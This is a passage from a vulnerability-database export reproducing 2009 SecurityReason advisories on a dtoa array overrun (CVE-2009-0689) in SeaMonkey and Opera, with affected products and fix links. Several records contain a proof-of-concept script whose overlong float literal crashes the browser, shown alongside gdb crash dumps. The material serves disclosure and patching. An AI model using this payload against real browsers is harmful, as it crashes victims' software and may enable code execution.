/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. 
Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF4ZoACgkQpiCeOKaYa9bJsACgqjmxJmR9BORNOK3YhNUeyz+o\r\nl8EAn2V+5mXH7GLWp+btWMf+4fGDeIzw\r\n=Zqoe\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-18282", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:31:05", "description": "No description provided by source.", "published": "2009-11-19T00:00:00", "type": "seebug", "title": "SeaMonkey 1.1.8 Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689", "CVE-2009-1563"], "modified": "2009-11-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18281", "id": "SSV:18281", "sourceData": "\n From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/221\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - SeaMonkey 1.1.18\r\n\r\nFixed in:\r\n- - SeaMonkey 2.0\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/71\r\n\r\n\r\n- --- 0.Description ---\r\nThe SeaMonkey project is a community effort to develop the SeaMonkey\r\nall-in-one internet application suite (see below). Such a software suite\r\nwas previously made popular by Netscape and Mozilla, and the SeaMonkey\r\nproject continues to develop and deliver high-quality updates to this\r\nconcept. 
Containing an Internet browser, email & newsgroup client with\r\nan included web feed reader, HTML editor, IRC chat and web development\r\ntools, SeaMonkey is sure to appeal to advanced users, web developers and\r\ncorporate users.\r\n\r\n\r\n- --- 1. SeaMonkey 1.1.18 Remote Array Overrun (Arbitrary code\r\nexecution) ---\r\nThe main problem exists in the dtoa implementation. SeaMonkey has the same\r\ndtoa as KDE, Opera and all BSD systems. This issue has been fixed in\r\nFirefox 3.5.4, and the fix\r\n\r\nhttp://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&file=jsdtoa.c&branch=&root=/cvsroot&subdir=mozilla/js/src&command=DIFF_FRAMESET&rev1=3.41&rev2=3.42\r\n\r\nhas been used to patch SeaMonkey 2.0.\r\n\r\nThis flaw was detected in May 2009 and assigned SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut the fix for SREASONRES:20090625 used by OpenBSD was not good.\r\nMore information about the fix for OpenBSD and similar systems is in\r\nSREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create a float literal of any length, which will overwrite\r\nmemory. Kmax is defined as 15. Functions in dtoa do not check the Kmax\r\nlimit, and it is possible to access elements 16 and above of the\r\nfreelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("9",299999); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nIf we open this PoC in SeaMonkey, SeaMonkey will crash. For example\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("1",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\n127# gdb seamonkey-bin seamonkey-bin.core\r\n...\r\n#0 0x28df0ecb in ?? ()\r\n...\r\n(gdb) i r\r\neax 0x0 0\r\necx 0x2 2\r\nedx 0xbfbfd2fc -1077947652\r\nebx 0x28da9b6c 685415276\r\nesp 0xbfbfd2ac 0xbfbfd2ac\r\nebp 0xbfbfd2c8 0xbfbfd2c8\r\nesi 0xb 11\r\nedi 0xb 11\r\neip 0x28df0ecb 0x28df0ecb\r\n...\r\n\r\nesi = edi = 11\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficially SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that it would inform all\r\nvendors about this issue; however, it did not do so. Even greater\r\nconfusion was caused by the new CVE number "CVE-2009-1563". Secunia\r\nreported that this vulnerability was only detected in Mozilla Firefox,\r\nbut nobody was aware that the problem affects other products (KDE,\r\nChrome) and that it is based on "CVE-2009-0689". After some time the\r\nMozilla Foundation Security Advisory\r\n(http://www.mozilla.org/security/announce/2009/mfsa2009-59.html)\r\nwas updated with the note:\r\n"The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz (CVE-2009-0689)".\r\nThis fact (a new CVE number for the Firefox vulnerability) and the\r\nJavaScript PoC (from Secunia) forced us to officially notify all other\r\nvendors. We publish all the individual advisories to formally show all\r\nvulnerable software and to avoid a wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\nPlease note:\r\nThe patch used in Firefox 3.5.4 does not fully solve the problem. The\r\ndtoa algorithm is not optimal and allows a remote Denial of Service in\r\nFirefox 3.5.5 when given a long float number.\r\n\r\n\r\n- --- 4. 
Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strt
odI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. 
Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF2IQACgkQpiCeOKaYa9Z2vgCgvqQwFzfwqYsBNbL2To29/o6D\r\nZBgAn0bwlhNtD89nVWtxI2Qf0UA7/ZqB\r\n=JY6k\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-18281", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:31:07", "description": "No description provided by source.", "published": "2009-11-19T00:00:00", "type": "seebug", "title": "Opera 10.01 Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689", "CVE-2009-1563"], "modified": "2009-11-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18283", "id": "SSV:18283", "sourceData": "\n From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/223\r\n\r\n[ Opera 10.01 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - Opera 10.01\r\n- - Opera 10.10 Beta\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/73\r\n\r\n\r\n- --- 0.Description ---\r\nOpera is a Web browser and Internet suite developed by the Opera\r\nSoftware company. The browser handles common Internet-related tasks such\r\nas displaying Web sites, sending and receiving e-mail messages, managing\r\ncontacts, IRC online chatting, downloading files via BitTorrent, and\r\nreading Web feeds. 
Opera is offered free of charge for personal\r\ncomputers and mobile phones.\r\n\r\n\r\n- --- 1. Opera 10.01 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exists in the dtoa implementation. Opera has a very\r\nsimilar dtoa algorithm to the BSD, Chrome and Mozilla products. It is\r\nthe same issue as SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut the fix for SREASONRES:20090625 used by OpenBSD was not good.\r\nMore information about the fix for OpenBSD and similar systems is in\r\nSREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create a float literal of any length, which will overwrite\r\nmemory. Kmax is defined as 15. Functions in dtoa do not check the Kmax\r\nlimit, and it is possible to access elements 16 and above of the\r\nfreelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("9",299999); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nIf we open this PoC in Opera, Opera will crash. For example\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("1",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nOPERA-CRASHLOG V1 desktop 10.01 1844 windows\r\nOpera.exe 1844 caused exception C0000005 at address 67956906 (Base: 400000)\r\n\r\nRegisters:\r\nEAX=01165C40 EBX=0592064C ECX=A0D589D4 EDX=42000000 ESI=C20471EC\r\nEDI=00000000 EBP=0012E384 ESP=0012E2FC EIP=67956906 FLAGS=00010202\r\nCS=001B DS=0023 SS=0023 ES=0023 FS=003B GS=0000\r\nFPU stack:\r\nC020A38F66534266F000 C020A38F66534266F000 3FFBE38E38E38E38D800\r\n3FC78000000000000000 10000000000100000000 0BBE0000000000040000\r\n00000000000000000000 2EBA804E2FDE00000000 SW=0122 CW=027F\r\n\r\n127# gdb -q opera opera.core\r\n...\r\nProgram terminated with signal 11, Segmentation fault.\r\n#0 0x2960307b in ?? ()\r\n...\r\n(gdb) i r\r\neax 0x71c71c71 1908874353\r\necx 0x2aa03be4 715144164\r\nedx 0x0 0\r\nebx 0x296177f8 694253560\r\nesp 0xbfbfb650 0xbfbfb650\r\nebp 0xbfbfb698 0xbfbfb698\r\nesi 0x2962d000 694341632\r\nedi 0x0 0\r\neip 0x2960307b 0x2960307b\r\n...\r\n(gdb) x/100x ($esi)-90\r\n0x2962cfa6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\r\n0x2962cfb6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\r\n0x2962cfc6: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7\r\n0x2962cfd6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\r\n0x2962cfe6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\r\n0x2962cff6: 0xc71c71c7 0x71c71c71 Cannot access memory at\r\naddress 0x2962cffe\r\n...\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficially SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that it would inform all\r\nvendors about this issue; however, it did not do so. Even greater\r\nconfusion was caused by the new CVE number "CVE-2009-1563". Secunia\r\nreported that this vulnerability was only detected in Mozilla Firefox,\r\nbut nobody was aware that the problem affects other products (KDE,\r\nChrome) and that it is based on "CVE-2009-0689". After some time the\r\nMozilla Foundation Security Advisory\r\n(http://www.mozilla.org/security/announce/2009/mfsa2009-59.html)\r\nwas updated with the note:\r\n"The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz (CVE-2009-0689)".\r\nThis fact (a new CVE number for the Firefox vulnerability) and the\r\nJavaScript PoC (from Secunia) forced us to officially notify all other\r\nvendors. We publish all the individual advisories to formally show all\r\nvulnerable software and to avoid a wrong CVE number. 
We do not see any\r\nother way to fix this issue in all products.\r\n\r\n\r\n- --- 4. Fix ---\r\nOpera fix:\r\nThe vulnerability was fixed in the latest release candidate, Opera RC3:\r\nhttp://snapshot.opera.com/windows/Opera_1010_1890_in.exe\r\nThe final version of Opera with the fix can be expected shortly.\r\n\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/c
vsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. 
Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF4esACgkQpiCeOKaYa9bOkQCcDLKKqvSyE1ZJZebhBBiow8tV\r\nXqQAnR79bagErDfzJ3TV/MlLgrWXsGD7\r\n=/IkD\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-18283", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:29:25", "description": "No description provided by source.", "published": "2009-11-22T00:00:00", "type": "seebug", "title": "Opera 10.01 Remote Array Overrun (Arbitrary code execution)", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689", "CVE-2009-1563"], "modified": "2009-11-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-14959", "id": "SSV:14959", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ Opera 10.01 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - Opera 10.01\r\n- - Opera 10.10 Beta\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/73\r\n\r\n\r\n- --- 0.Description ---\r\nOpera is a Web browser and Internet suite developed by the Opera Software company. \\\r\nThe browser handles common Internet-related tasks such as displaying Web sites, \\\r\nsending and receiving e-mail messages, managing contacts, IRC online chatting, \\\r\ndownloading files via BitTorrent, and reading Web feeds. 
Opera is offered free of \\\r\ncharge for personal computers and mobile phones.\r\n\r\n\r\n- --- 1. Opera 10.01 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exists in the dtoa implementation. Opera has a very similar dtoa \\\r\nalgorithm to the BSD, Chrome and Mozilla products. It is the same issue as \\\r\nSREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut the fix for SREASONRES:20090625 used by OpenBSD was not good. \r\nMore information about the fix for OpenBSD and similar systems is in \\\r\nSREASONRES:20091030, \r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create a float literal of any length, which will overwrite memory. Kmax is \\\r\ndefined as 15. Functions in dtoa do not check the Kmax limit, and it is possible to \\\r\naccess elements 16 and above of the freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("9",299999); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nIf we open this PoC in Opera, Opera will crash. For example\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("1",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nOPERA-CRASHLOG V1 desktop 10.01 1844 windows\r\nOpera.exe 1844 caused exception C0000005 at address 67956906 (Base: 400000)\r\n\r\nRegisters:\r\nEAX=01165C40 EBX=0592064C ECX=A0D589D4 EDX=42000000 ESI=C20471EC\r\nEDI=00000000 EBP=0012E384 ESP=0012E2FC EIP=67956906 FLAGS=00010202\r\nCS=001B DS=0023 SS=0023 ES=0023 FS=003B GS=0000\r\nFPU stack:\r\nC020A38F66534266F000 C020A38F66534266F000 3FFBE38E38E38E38D800\r\n3FC78000000000000000 10000000000100000000 0BBE0000000000040000\r\n00000000000000000000 2EBA804E2FDE00000000 SW=0122 CW=027F\r\n\r\n127# gdb -q opera opera.core\r\n...\r\nProgram terminated with signal 11, Segmentation fault.\r\n#0 0x2960307b in ?? ()\r\n...\r\n(gdb) i r\r\neax 0x71c71c71 1908874353\r\necx 0x2aa03be4 715144164\r\nedx 0x0 0\r\nebx 0x296177f8 694253560\r\nesp 0xbfbfb650 0xbfbfb650\r\nebp 0xbfbfb698 0xbfbfb698\r\nesi 0x2962d000 694341632\r\nedi 0x0 0\r\neip 0x2960307b 0x2960307b\r\n...\r\n(gdb) x/100x ($esi)-90\r\n0x2962cfa6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\r\n0x2962cfb6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\r\n0x2962cfc6: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7\r\n0x2962cfd6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\r\n0x2962cfe6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\r\n0x2962cff6: 0xc71c71c7 0x71c71c71 Cannot access memory at address \\\r\n 0x2962cffe\r\n...\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficially SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google 